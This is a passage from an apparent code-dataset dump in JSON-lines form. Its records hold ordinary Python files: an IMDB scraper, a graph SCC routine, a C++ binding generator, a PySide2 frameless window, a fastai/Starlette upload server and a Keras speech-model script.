movie_name=((movie_name+n).strip())\n        else:\n            break\n\n    from_summry=page_soups.find(\"div\",class_=\"plot_summary\")\n    director=from_summry.find(\"div\",class_=\"credit_summary_item\")\n    director_name=director.find_all(\"a\")\n\n    names=[ ]\n    for name in director_name:\n        movie_director_name=(name.get_text().strip())\n        \n        names.append(movie_director_name)\n\n    bio_of_movie=[ ]\n    movie_bio=from_summry.find(\"div\",class_=\"summary_text\").get_text().strip()\n\n    bio_of_movie.append(movie_bio)\n    \n    div_subtext=page_soups.find(\"div\",class_=\"subtext\")\n    \n    movie_time=div_subtext.find(\"time\").get_text()\n    str_time=(movie_time.strip().split())\n    # return (len(str_time))\n\n    if len(str_time)==2:\n        for i in str_time:\n            if \"h\" in i:\n                time=int(i.strip(\"h\"))\n            if \"min\" in i:\n                minutes=int(i.strip(\"min\"))\n        cine_time=(str(time*60+minutes)+\"min\")\n    if len(str_time)==1:\n        # handle both hours-only (\"2h\") and minutes-only (\"45min\") runtimes\n        if \"min\" in str_time[0]:\n            cine_time=str_time[0]\n        else:\n            time=str_time[0][:-1]\n            cine_time=(str(int(time)*60)+\"min\")\n    movie_genere=div_subtext.find_all(\"a\")\n    store_genere=[ ]\n    for genr in movie_genere:\n        genere=(genr.get_text())\n        store_genere.append(genere)\n    store_genere.pop()\n    \n    photo=page_soups.find(\"div\",class_=\"poster\").img[\"src\"]\n    \n    more_data=page_soups.find(\"div\",attrs={\"class\":\"article\",\"id\":\"titleDetails\"})\n    data=more_data.find_all(\"div\",class_=\"txt-block\")\n    movie_language_list=[ ]\n    movie_country_list=[ ]\n    count=0\n    for txt_block_indx in data:\n        txt_all_h4=txt_block_indx.find(\"h4\",class_=\"inline\")\n        if count==2: \n            break\n        if txt_all_h4.get_text()==\"Country:\":\n            coun=txt_block_indx.find(\"a\").get_text()\n            movie_country_list.append(coun)\n            count=count+1\n        if txt_all_h4.get_text()==\"Language:\":\n            
langu=txt_block_indx.find_all(\"a\")\n            for la in langu:\n                movie_language_list.append(la.get_text())\n            count=count+1\n    \n    movie_details={ }\n    movie_details[\"name\"]=movie_name\n    movie_details[\"director\"]=names\n    movie_details[\"bio\"]=bio_of_movie\n    movie_details[\"RunTime\"]=cine_time\n    movie_details[\"genere\"]=store_genere\n    movie_details[\"poster_image_url\"]=photo\n    movie_details[\"country\"]=movie_country_list\n    movie_details[\"Language\"]=movie_language_list\n    movie_details[\"Cast\"]=id_name\n    return movie_details\n\nurl_details=scrape_movie_details(url)\n# pprint.pprint(url_details)\n\n###task 5\n\napi_list=[ ]\ndef get_movie_list_details(movie_list):\n    top_movie_details=[ ]\n    for api in movie_list[:30]:\n        api_list.append(api[\"url\"])\n    # return api_list\n    for api_list_index in api_list:\n        url_data=scrape_movie_details(api_list_index)\n        top_movie_details.append(url_data)\n    return top_movie_details\n\nten_movie_details=get_movie_list_details(scrapped) \n# pprint.pprint(ten_movie_details) \n\n####### Task 14\n\ndef analyse_co_actors(scrapped):\n\tmovies= scrapped[0:]\n\tdicById = {}\n\tfor i in movies: \n\t    cast = i['Cast']\n\t    dicById[cast[0]['ID']] = {'name' : cast[0]['Name'],'frequent_co_actors' : []} \n\n\tfor j in dicById: \n\t    for k in scrapped: \n\t        for l in k:\n\t            if(l == 'Cast'):\n\t                index = 0\n\t                main = k[l][0]['ID']\n\t                if(main == j): \n\t                    for cast in k[l][1:6]: \n\t                        count = 1\n\t                        for idmatch in dicById[j]['frequent_co_actors']:\n\t                            if(idmatch['id']==cast['ID']):\n\t                                count+=idmatch['num_movies'] \n\t                        n = {'id' : cast['ID'], 'Name' : cast['Name'], 'num_movies' : count} \n\t                        dicById[j]['frequent_co_actors'].append(n) \n\treturn dicById\n\nprint(analyse_co_actors(ten_movie_details))\n\n\n","sub_path":"forteen_task_imdb.py","file_name":"forteen_task_imdb.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"159544732","text":"from collections import defaultdict\n\ngraph = defaultdict(list)\n\n\ndef add_edge(graph,u,v):\n    graph[u].append(v)\n\ndef dfs(graph,visited,src):\n    print(src,end=' ')\n    visited[src] = True\n    for nbr in graph[src]:\n        if not visited[nbr]:\n            dfs(graph,visited,nbr)\n\ndef dfsToAppend(graph,src,visited,stack):\n    visited[src] = True\n    for nbr in graph[src]:\n        if not visited[nbr]:\n            dfsToAppend(graph,nbr,visited,stack)\n    stack.append(src)\n\ndef reverseGraph(graph):\n    g = defaultdict(list)\n    for node in graph:\n        for nbr in graph[node]:\n            add_edge(g,nbr,node)\n    return g\n\ndef printSCC(graph,src):\n    visited = defaultdict(bool)\n    stack = []\n    dfsToAppend(graph,src,visited,stack)\n\n    # Reverse the graph\n    g = reverseGraph(graph)\n\n    # Print SCC: each unvisited node popped from the stack starts a new component\n    visited_scc = defaultdict(bool)\n    while stack:\n        node = stack.pop()\n        if not visited_scc[node]:\n            dfs(g,visited_scc,node)\n            print(\"\")\n\nadd_edge(graph,1,0)\nadd_edge(graph,0,2)\nadd_edge(graph,2,1)\nadd_edge(graph,0,3)\nadd_edge(graph,3,4)\n\nprintSCC(graph,1)\n\n","sub_path":"Graph/SCC.py","file_name":"SCC.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"413954015","text":"import pickle\nimport os\nimport sys\nimport re\n\n\nclass GenDeclaration:\n\tdef __init__(self):\n\t\tself.type = None\n\t\tself.name = None\n\tdef __repr__(self):\n\t\treturn f\"{self.type}\" + (f\" {self.name}\" if self.name else \"\")\n\tdef getType(self, default=None):\n\t\treturn self.type\n\tdef getName(self, 
default=None):\n\t\treturn f\"p{default}\"\n\tdef getExpr(self, default=None):\n\t\tif self.type is None:\n\t\t\treturn self.getName(default)\n\t\treturn f\"{self.getType(default)} {self.getName(default)}\"\n\nclass GenFunction:\n\tdef __init__(self):\n\t\tself.static = False\n\t\tself.virtual = False\n\t\tself.const = False\n\t\tself.declare = None\n\t\tself.parameters = []\n\t\tself.offset = 0\n\t\tself.parent = None\n\t\tself.convention = None\n\t\tself.mangle = \"\"\n\tdef __repr__(self):\n\t\treturn f\"{self.declare}({self.parameters}) = {self.offset}\"\n\tdef getAddress(self, t, i):\n\t\tif self.offset is None:\n\t\t\treturn None\n\t\tif t == \"MacOS\":\n\t\t\treturn \"base+\" + str(self.offset[0])\n\n\t\tif t == \"Win32\":\n\t\t\tif \"cocos2d\" in self.parent.name:\n\t\t\t\tif linkable(self):\n\t\t\t\t\treturn f\"FunctionScrapper::pointerOf((mem{i})(&{self.parent.name}::{self.declare.name}))\"\n\t\t\t\t# return f\"dlsym((void*)base, {self.mangle})\"\n\t\t\treturn \"base+\" + str(self.offset[1])\n\n\t\tif t == \"iOS\":\n\t\t\treturn \"base+\" + str(self.offset[2])\n\n\t\tif t == \"Android\":\n\t\t\tif linkable(self) and self.declare.name not in ['constructor', 'destructor']:\n\t\t\t\treturn f\"FunctionScrapper::pointerOf((mem{i})(&{self.parent.name}::{self.declare.name}))\"\n\t\t\treturn f'(uintptr_t)dlsym((void*)base, \"{self.getMangle()}\")'\n\t\n\tdef getOffset(self, t):\n\t\tif self.offset is None:\n\t\t\treturn None\n\t\tif t == \"MacOS\":\n\t\t\treturn str(self.offset[0])\n\n\t\tif t == \"Win32\":\n\t\t\treturn str(self.offset[1])\n\n\t\tif t == \"iOS\":\n\t\t\treturn str(self.offset[2])\n\n\t\tif t == \"Android\":\n\t\t\treturn \"\"\n\n\tdef getMangle(self):\n\t\treturn self.mangle\n\n\nclass GenMember:\n\tdef __init__(self):\n\t\tself.declare = None\n\t\tself.offset = None\n\tdef __repr__(self):\n\t\treturn f\"{self.declare} = {self.offset}\"\n\tdef getOffset(self, t):\n\t\tif self.offset is None:\n\t\t\treturn None\n\t\tif t == \"MacOS\":\n\t\t\treturn self.offset[0]\n\t\tif t == \"Win32\":\n\t\t\treturn self.offset[1]\n\t\tif t == \"iOS\":\n\t\t\treturn self.offset[2]\n\nclass GenClass:\n\tdef __init__(self):\n\t\tself.info = []\n\t\tself.name = \"\"\n\t\tself.base = []\n\tdef __repr__(self):\n\t\treturn self.name + \": \" + ', '.join(self.base) + \"\\n\" + '\\n'.join(repr(r) for r in self.info)\n\npicklepath = os.path.join(os.path.dirname(__file__), \"gen.pickle\")\nplatform = sys.argv[1]\n\ndef inheritReturn(info):\n\tif info.declare.type != \"auto\":\n\t\treturn info.declare.type\n\tif len(info.parameters) == 0:\n\t\treturn f\"getPReturnOf({info.parent.name}, {info.declare.name})\"\n\tdefaults = ', '.join([info.parent.name, info.declare.name] + [f\"std::declval<{arg.getType(i)}>()\" for i, arg in enumerate(info.parameters)])\n\treturn f\"getReturnOf({defaults})\"\n\nfunctionBody = \"\"\"\t\tusing r{id} = {type};\n\t\tusing f{id} = r{id}(CallConv(__thiscall)*)({const}{cl}*{params2});\n\t\t{setAddress}\n\t\treturn reinterpret_cast<f{id}>({offset})(this{params});\"\"\"\n\nstaticBody = \"\"\"\t\tusing r{id} = {type};\n\t\tusing f{id} = r{id}(CallConv(__fastcall)*)({params2});\n\t\t{setAddress}\n\t\treturn reinterpret_cast<f{id}>({offset})({params});\"\"\"\n\nreturnlessBody = \"\"\"\t\tusing r{id} = {cl}*;\n\t\tusing f{id} = r{id}(CallConv(__thiscall)*)({const}{cl}*{params2});\n\t\t{setAddress}\n\t\treinterpret_cast<f{id}>({offset})(this{params});\"\"\"\n\nimplementedFunctionBody = \"\"\"\t\treturn this->{cl}::{name}({params});\"\"\"\n\nimplementedStaticBody = \"\"\"\t\treturn 
{cl}::{name}({params});\"\"\"\n\ndef hasstl(info):\n\tfor arg in info.parameters:\n\t\tif \"gd::\" in arg.type:\n\t\t\treturn True\n\treturn False\n\ndef linkable(info):\n\tif platform == \"Android\":\n\t\treturn not hasstl(info)\n\tif platform == \"Windows\":\n\t\tif \"cocos2d::\" in info.parent.name:\n\t\t\treturn not hasstl(info)\n\t\treturn False\n\ndef getFunctionImplementation(cl, info, i):\n\tif not isinstance(info, GenFunction):\n\t\treturn \"\"\n\n\tif linkable(info):\n\t\tbody = implementedFunctionBody\n\t\tif info.static:\n\t\t\tbody = implementedStaticBody\n\n\t\treturn body.format(\n\t\t\tid = i,\n\t\t\tparams = ', '.join(arg.getName(i) for i, arg in enumerate(info.parameters)),\n\t\t\tname = info.declare.name,\n\t\t\tcl = cl.name,\n\t\t)\n\n\tbody = functionBody\n\tif info.static:\n\t\tbody = staticBody\n\tif not info.declare.type:\n\t\tbody = returnlessBody\n\treturn body.format(\n\t\tid = i,\n\t\ttype = inheritReturn(info),\n\t\toffset = info.getAddress(platform, i), \n\t\tparams = (', ' if not info.static and len(info.parameters) > 0 else \"\") + ', '.join(arg.getName(i) for i, arg in enumerate(info.parameters)),\n\t\tname = info.declare.name,\n\t\tcl = cl.name,\n\t\tparams2 = (', ' if not info.static and len(info.parameters) > 0 else \"\") + ', '.join(arg.getType(i) for i, arg in enumerate(info.parameters)),\n\t\tconst = \"const \" if info.const else \"\",\n\t\tsetAddress = info.setAddress(platform, i),\n\t)\n\n\ndef writeIfDifferent(name, out):\n\tfilePath = os.path.join(os.path.dirname(__file__), \"..\", name)\n\n\tdef isDifferent():\n\t\twith open(filePath, \"r\") as f:\n\t\t\treturn f.read() != out\n\n\tif not os.path.isfile(filePath) or isDifferent():\n\t\twith open(filePath, \"w\") as f:\n\t\t\tf.write(out)\n\ndef getNamespace(name):\n\treturn '::'.join(name.split('::')[:-1])\n\ndef stripNamespace(name):\n\treturn name.split('::')[-1]\n\nwith open(os.path.join(os.path.dirname(__file__), \"scrap\", \"libcocos2d.demangled.txt\"), \"r\") as f2:\n\taccessSpecifier = {}\n\tfor line in f2.readlines():\n\t\tmatch = re.search(r\"(.+?):.+(cocos2d::.+?)\\(\", line)\n\t\tif match is not None:\n\t\t\taccessSpecifier[match.group(2)] = match.group(1)\n\t# im sorry\n\n\tdef getAccessSpecifierOf(func):\n\t\tif func not in accessSpecifier:\n\t\t\treturn \"private\"\n\t\treturn accessSpecifier[func]\n","sub_path":"Source/Cacao/gen/Shared.py","file_name":"Shared.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"557894272","text":"from PySide2.QtCore import Qt, QMetaObject, Signal, Slot, QSize, QRect, QPoint\nfrom PySide2.QtWidgets import (QWidget, QVBoxLayout, QHBoxLayout, QToolButton, QMenu,\n                               QLabel, QSizePolicy, QDialog, QApplication, QGraphicsDropShadowEffect)\nfrom ._utils import PLATFORM, resource_path\nimport pyautogui\n\n\n_FL_STYLESHEET = resource_path('resources/frameless.qss')\n\"\"\" str: Frameless window stylesheet. 
\"\"\"\n\n\nclass WindowDragger(QWidget):\n\n doubleClicked = Signal()\n\n def __init__(self, window: QWidget, parent=None):\n \"\"\"\n This is the frame/titlebar.\n\n :param window: The contained window\n :type window:\n \"\"\"\n QWidget.__init__(self, parent)\n\n self._window = window\n self._mousePressed = False\n\n def mousePressEvent(self, event):\n self._mousePressed = True\n self._mousePos = event.globalPos()\n self._windowPos = self._window.pos()\n\n def mouseMoveEvent(self, event):\n if self._mousePressed:\n if event.globalPos().y() < 5 and not self._window.maximized: # Within the top part of the screen\n self._window.move(0, 0)\n self._window.showMaximized()\n elif event.globalPos().y() > 5: # Any other part of screen\n if self._window.maximized: # Coming from top part of screen\n self._window.showNormal()\n newX = event.globalPos().x() - \\\n self._window.size().width() * (event.globalPos().x() / self._window.screenSize.width())\n self._window.move(newX, event.globalPos().y())\n self._windowPos = QPoint(newX, event.globalPos().y()-8)\n self._mousePos = event.globalPos()\n else: # anywhere else\n self._window.move(self._windowPos + (event.globalPos() - self._mousePos))\n\n def mouseReleaseEvent(self, event):\n self._mousePressed = False\n self.fromMaxed = None\n\n def mouseDoubleClickEvent(self, event):\n self.doubleClicked.emit()\n\n\nclass ModernWindow(QDialog):\n \"\"\"\n Modern window.\n\n Args:\n w (QWidget): Main widget.\n parent (QWidget, optional): Parent widget.\n \"\"\"\n\n # MODAL_WINDOWS = []\n # INST = False\n\n def __init__(self, w, parent=None, modal=True):\n # Since all parent windows will also have these wrappers, the parent is actually the modernwindow\n QDialog.__init__(self, parent)\n\n # w.wrapper = self\n self._w = w\n self.setupUi()\n\n # -1 so that task bar can be shown on Windows\n self.screenSize = QSize(pyautogui.size().width, pyautogui.size().height - 1)\n self.usualSize = self.size()\n self.maximized = False\n self._movedToCenter = 0\n self.showNormal()\n\n contentLayout = QHBoxLayout()\n contentLayout.setContentsMargins(0, 0, 0, 0)\n contentLayout.addWidget(w)\n\n self.windowContent.setLayout(contentLayout)\n\n self.setWindowTitle(w.windowTitle())\n # w.windowTitleChanged.connect(lambda title: self.setWindowTitle(title))\n\n rect = w.geometry()\n rect.setHeight(rect.height() + self.titleBar.size().height())\n self.setGeometry(rect)\n\n # Adding attribute to clean up the parent window when the child is closed\n self._w.setAttribute(Qt.WA_DeleteOnClose, True)\n self._w.destroyed.connect(self.__child_was_closed)\n\n effect = QGraphicsDropShadowEffect()\n effect.setBlurRadius(5)\n self.setGraphicsEffect(effect)\n\n self.modal = modal\n if modal:\n # Modality doesn't usually work, this fixes it, kind of.\n # Kind of an overkill bc it stays over other windows too, but otherwise doesn't work.\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowFlag(Qt.WindowStaysOnTopHint)\n # ModernWindow.MODAL_WINDOWS.append(self)\n\n # if not ModernWindow.INST: # Trying to get normal modal behavior\n # def modalityHandler(x, y):\n # wins = [win for win in QApplication.topLevelWidgets() if isinstance(win, ModernWindow)]\n # if x is None and y is not None:\n # if y.window() in ModernWindow.MODAL_WINDOWS:\n # y.window().setWindowFlag(Qt.WindowStaysOnTopHint)\n # elif y is None and x is not None:\n # if x.window() in ModernWindow.MODAL_WINDOWS:\n # x.window().setWindowFlag(Qt.WindowStaysOnTopHint, False)\n # for win in wins:\n # win.show()\n #\n # 
QApplication.instance().focusChanged.connect(lambda x, y: modalityHandler(x, y))\n # ModernWindow.INST = True\n\n def setupUi(self):\n # create title bar, content\n self.vboxWindow = QVBoxLayout(self)\n self.vboxWindow.setObjectName('vboxWindow')\n self.vboxWindow.setContentsMargins(0, 0, 0, 0)\n\n self.windowFrame = QWidget(self)\n self.windowFrame.setObjectName('windowFrame')\n\n self.vboxFrame = QVBoxLayout(self.windowFrame)\n self.vboxFrame.setContentsMargins(0, 0, 0, 0)\n\n self.titleBar = WindowDragger(self, self.windowFrame)\n self.titleBar.setObjectName('titleBar')\n self.titleBar.setSizePolicy(QSizePolicy(QSizePolicy.Preferred,\n QSizePolicy.Fixed))\n\n self.hboxTitle = QHBoxLayout(self.titleBar)\n self.hboxTitle.setContentsMargins(0, 0, 0, 0)\n self.hboxTitle.setSpacing(0)\n\n self.lblTitle = QLabel('Title')\n self.lblTitle.setObjectName('lblTitle')\n self.lblTitle.setAlignment(Qt.AlignCenter)\n\n spButtons = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n\n self.btnMinimize = QToolButton(self.titleBar)\n self.btnMinimize.setObjectName('btnMinimize')\n self.btnMinimize.setSizePolicy(spButtons)\n\n self.btnRestore = QToolButton(self.titleBar)\n self.btnRestore.setObjectName('btnRestore')\n self.btnRestore.setSizePolicy(spButtons)\n\n self.btnMaximize = QToolButton(self.titleBar)\n self.btnMaximize.setObjectName('btnMaximize')\n self.btnMaximize.setSizePolicy(spButtons)\n\n self.btnClose = QToolButton(self.titleBar)\n self.btnClose.setObjectName('btnClose')\n self.btnClose.setSizePolicy(spButtons)\n\n self.vboxFrame.addWidget(self.titleBar)\n\n self.windowContent = QWidget(self.windowFrame)\n self.vboxFrame.addWidget(self.windowContent)\n\n self.vboxWindow.addWidget(self.windowFrame)\n\n if PLATFORM == \"Darwin\":\n self.hboxTitle.addWidget(self.btnClose)\n self.hboxTitle.addWidget(self.btnMinimize)\n self.hboxTitle.addWidget(self.btnRestore)\n self.hboxTitle.addWidget(self.btnMaximize)\n self.hboxTitle.addWidget(self.lblTitle)\n else:\n self.hboxTitle.addWidget(self.lblTitle)\n self.hboxTitle.addWidget(self.btnMinimize)\n self.hboxTitle.addWidget(self.btnRestore)\n self.hboxTitle.addWidget(self.btnMaximize)\n self.hboxTitle.addWidget(self.btnClose)\n\n # set window flags\n self.setWindowFlags(Qt.Dialog | Qt.FramelessWindowHint | Qt.WindowSystemMenuHint |\n Qt.WindowCloseButtonHint | Qt.WindowMinimizeButtonHint | Qt.WindowMaximizeButtonHint)\n\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n # set stylesheet\n with open(_FL_STYLESHEET) as stylesheet:\n self.setStyleSheet(stylesheet.read())\n\n # automatically connect slots\n QMetaObject.connectSlotsByName(self)\n\n def __child_was_closed(self):\n self._w = None # The child was deleted, remove the reference to it and close the parent window\n self.close()\n\n def closeEvent(self, event):\n # if self.modal:\n # ModernWindow.MODAL_WINDOWS.remove(self)\n\n if not self._w:\n event.accept()\n else:\n self._w.close()\n event.setAccepted(self._w.isHidden())\n\n def setWindowTitle(self, title):\n \"\"\" Set window title.\n\n Args:\n title (str): Title.\n \"\"\"\n\n QDialog.setWindowTitle(self, \" \" + title)\n self.lblTitle.setText(\" \" + title)\n\n def _setWindowButtonState(self, hint, state):\n btns = {\n Qt.WindowCloseButtonHint: self.btnClose,\n Qt.WindowMinimizeButtonHint: self.btnMinimize,\n Qt.WindowMaximizeButtonHint: self.btnMaximize\n }\n button = btns.get(hint)\n\n maximized = bool(self.windowState() & Qt.WindowMaximized)\n\n if button == self.btnMaximize: # special rules for max/restore\n 
self.btnRestore.setEnabled(state)\n self.btnMaximize.setEnabled(state)\n\n if maximized:\n self.btnRestore.setVisible(state)\n self.btnMaximize.setVisible(False)\n else:\n self.btnMaximize.setVisible(state)\n self.btnRestore.setVisible(False)\n else:\n button.setEnabled(state)\n\n allButtons = [self.btnClose, self.btnMinimize, self.btnMaximize, self.btnRestore]\n if True in [b.isEnabled() for b in allButtons]:\n for b in allButtons:\n b.setVisible(True)\n if maximized:\n self.btnMaximize.setVisible(False)\n else:\n self.btnRestore.setVisible(False)\n self.lblTitle.setContentsMargins(0, 0, 0, 0)\n else:\n for b in allButtons:\n b.setVisible(False)\n self.lblTitle.setContentsMargins(0, 2, 0, 0)\n\n def setWindowFlag(self, Qt_WindowType, on=True):\n buttonHints = [Qt.WindowCloseButtonHint, Qt.WindowMinimizeButtonHint, Qt.WindowMaximizeButtonHint]\n\n if Qt_WindowType in buttonHints:\n self._setWindowButtonState(Qt_WindowType, on)\n else:\n QWidget.setWindowFlag(self, Qt_WindowType, on)\n\n def setWindowFlags(self, Qt_WindowFlags):\n buttonHints = [Qt.WindowCloseButtonHint, Qt.WindowMinimizeButtonHint, Qt.WindowMaximizeButtonHint]\n for hint in buttonHints:\n self._setWindowButtonState(hint, bool(Qt_WindowFlags & hint))\n\n QWidget.setWindowFlags(self, Qt_WindowFlags)\n\n @Slot()\n def on_btnMinimize_clicked(self):\n self.showMinimized()\n\n @Slot()\n def on_btnMaximize_clicked(self):\n if self.maximized:\n self.showNormal()\n else:\n self.showMaximized()\n\n @Slot()\n def on_btnClose_clicked(self):\n self.close()\n\n @Slot()\n def on_titleBar_doubleClicked(self):\n self.on_btnMaximize_clicked()\n\n def showMaximized(self):\n \"\"\"\n Overrides showMaximized to give normal functionality (not usually normal since this is a widget)\n \"\"\"\n self.usualSize = self.size()\n self.setWindowState(Qt.WindowMaximized)\n self.move(0, 0)\n self.setFixedSize(QSize(self.screenSize.width(), self.screenSize.height()))\n self.maximized = True\n QWidget.showMaximized(self)\n\n def showNormal(self):\n self.setWindowState(Qt.WindowNoState)\n self.setMinimumSize(100, 50)\n self.resize(self.usualSize)\n self.maximized = False\n QWidget.showNormal(self)\n\n def exec_(self) -> int:\n \"\"\"\n Overloads the original exec function to give expected behavior with custom title bar.\n Returns button clicked if dialog.\n :return: integer bit value of button clicked\n :rtype: int\n \"\"\"\n self._w.finished.connect(lambda state: self.done(state))\n return QDialog.exec_(self)\n\n def resizeEvent(self, event: 'QResizeEvent'):\n \"\"\"\n Catches when self is resized, and makes sure\n\n :param event: The resize event, storing the new size\n :type event: QResizeEvent\n \"\"\"\n newSize = event.size()\n # self.setMask(QRegion(self.rect()))\n\n if self._movedToCenter < 3: # 2 size adjustments are done before self reaches its final assigned size.\n self.move(self.screenSize.width() / 2 - newSize.width() / 2,\n self.screenSize.height() / 2 - newSize.height() / 2)\n self._movedToCenter += 1\n","sub_path":"qtmodern_facade/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":12471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"177325717","text":"import aiohttp\nimport asyncio\nimport uvicorn\nimport pandas as pd\nimport re\nimport numpy as np\nfrom fastai import *\nfrom fastai.vision import *\nfrom io import BytesIO\nfrom starlette.applications import Starlette\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.responses import 
HTMLResponse, JSONResponse\nfrom starlette.staticfiles import StaticFiles\n\nexport_file_url = 'https://www.dropbox.com/s/xw4kzxi0jrf1gou/dgwbh.pkl?dl=1'\nexport_file_name = 'dgwbh.pkl'\n\nclasses = ['lidl', 'spisestuerne', 'netto', 'seveneleven']\npath = Path(__file__).parent\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\n\nasync def download_file(url, dest):\n if dest.exists(): return\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n data = await response.read()\n with open(dest, 'wb') as f:\n f.write(data)\n\n\nasync def setup_learner():\n await download_file(export_file_url, path / export_file_name)\n try:\n learn = load_learner(path, export_file_name)\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\n\nloop = asyncio.get_event_loop()\ntasks = [asyncio.ensure_future(setup_learner())]\nlearn = loop.run_until_complete(asyncio.gather(*tasks))[0]\nloop.close()\n\n\n@app.route('/')\nasync def homepage(request):\n html_file = path / 'view' / 'FileUpload.html'\n return HTMLResponse(html_file.open().read())\n\n\n@app.route('/upload', methods=['POST'])\nasync def upload_file(request):\n csv_data = await request.form()\n csv_bytes = await (csv_data['file'].read())\n \n x = str(csv_bytes)\n l = x.split('\\\\r\\\\')\n d = np.array(l)\n \n df = pd.DataFrame()\n df['Dato'] = df.apply(lambda _: '', axis=1)\n df['Tekst'] = df.apply(lambda _: '', axis=1)\n df['Beløb'] = df.apply(lambda _: '', axis=1)\n df['Saldo'] = df.apply(lambda _: '', axis=1)\n df['Status'] = df.apply(lambda _: '', axis=1)\n df['Afstemt'] = df.apply(lambda _: '', axis=1)\n \n date=[]\n text=[]\n amount=[]\n saldo=[]\n status=[]\n afstemt=[]\n \n \n\n\n for line in range(d.shape[0]):\n a = d[line].split('\\\\\";\\\\\"')\n date.append(a[0])\n text.append(a[1])\n amount.append(a[2])\n saldo.append(a[3])\n status.append(a[4])\n afstemt.append(a[5])\n \n #df['Dato']=date\n #df['Tekst']=text\n #df['Beløb']=amount\n #df['Saldo']=saldo\n #df['Status']=status\n #df['Afstemt']=afstemt\n \n #df['Dato'] = df['Dato'].replace({'\\n\\\"':''}, regex = True)\n #df['Dato'] = df['Dato'].replace({'\\\"':''}, regex = True)\n #df['Tekst'] = df['Tekst'].replace({'\\\"':''}, regex = True)\n #df['Beløb'] = df['Beløb'].replace({'\\\"':''}, regex = True)\n #df['Beløb'] = df['Beløb'].replace({'\\.':''}, regex = True)\n #df['Beløb'] = df['Beløb'].replace({'\\,':'.'}, regex = True)\n \n # df1 = df[['Dato','Tekst','Beløb']][1:]\n \n #df1['Prediction'] = df1.apply(lambda _: '', axis=1)\n\n #for i in range(df1.shape[0]):\n # df1['Prediction'][i] = learn.predict(df1['Tekst'][i])\n\n #df1['Prediction'] = df1['Prediction'].astype(str)\n\n #def clean_predictions(programme): \n # Search for comma in the name followed by any characters repeated any number of times \n # if re.search('\\,.*', programme): \n \n # Extract the position of beginning of pattern \n # pos = re.search('\\,.*', programme).start() \n # pos1 = (programme).find(' ')\n \n # return the cleaned name \n # return 
programme[pos1+1:pos] \n \n #else: \n #if none of those patterns found, return the original name\n # return programme \n \n# Updated the study programme columns \n # df1['Prediction'] = df1['Prediction'].apply(clean_predictions)\n \n #csv = (BytesIO(csv_bytes))\n \n #print(str(filename))\n #JSONResponse({'result': str(filename)})\n #prediction = learn.predict('lidl')\n #return JSONResponse({'result': str(prediction)})\n#async def analyze(request):\n # prediction = learn.predict('lidl')\n # return JSONResponse({'result': str(prediction)})\n #img_data = await request.form()\n #img_bytes = await (img_data['file'].read())\n #img = open_image(BytesIO(img_bytes))\n #prediction = learn.predict(img)[0]\n #return JSONResponse({'result': str(prediction)})\n\n\nif __name__ == '__main__':\n if 'serve' in sys.argv:\n uvicorn.run(app=app, host='0.0.0.0', port=5000, log_level=\"info\")\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"62051778","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport pickle as pkl\nimport os\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers import Conv1D, Conv2D, Reshape, Flatten, Bidirectional, TimeDistributed, GRU\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nfrom keras.models import load_model,model_from_json\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n#os.environ[\"THEANO_FLAGS\"] = \"device=gpu0\"\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\nimport json\n\ndata_path = \"feature/mfcc\"\nmodel_name = [\"best_1\",\"best_2\",\"best_3\"]\ndim_dict = {\"mfcc\" : 39, \"fbank\" : 69}\n\n# parameter\nnb_epoch = 500\nnb_batch = 20\nsplit_ratio = 0.33\n\nXtrain_raw = pkl.load(open(\"%s/Xtrain.pkl\" % data_path,'rb'))\nYtrain_raw = pkl.load(open(\"%s/Ytrain.pkl\" % data_path,'rb'))\n\n\nprint(\"Files loaded\")\n\ndef split_data(X,Y,split_ratio):\n\tindices = np.arange(X.shape[0]) \n\tnp.random.shuffle(indices) \n\n\tX_data = X[indices]\n\tY_data = Y[indices]\n\n\tnum_validation_sample = int(split_ratio * X_data.shape[0] )\n\n\tX_train = X_data[num_validation_sample:]\n\tY_train = Y_data[num_validation_sample:]\n\n\tX_val = X_data[:num_validation_sample]\n\tY_val = Y_data[:num_validation_sample]\n\n\treturn (X_train,Y_train),(X_val,Y_val)\n\ndef check_min_lebal(Y):\n\ta = Y.reshape(Y.shape[0]*Y.shape[1],Y.shape[2])\n\ts = np.sum(a,axis = 0)\n\tans = s.min()\n\tprint(ans)\n\treturn ans > 2100\n\n### split_data\n(Xtrain,Ytrain),(Xval,Yval) = split_data(Xtrain_raw,Ytrain_raw,split_ratio)\n\nwhile not (check_min_lebal(Ytrain)):\n\t(Xtrain,Ytrain),(Xval,Yval) = split_data(Xtrain_raw,Ytrain_raw,split_ratio)\n\ndef get_model(name):\n\n\tif name == model_name[0]:\n\t\tmodel = Sequential()\n\t\tprint('Building model.')\n\t\tmodel.add(Bidirectional(GRU(500,dropout = 0.3,activation='relu', 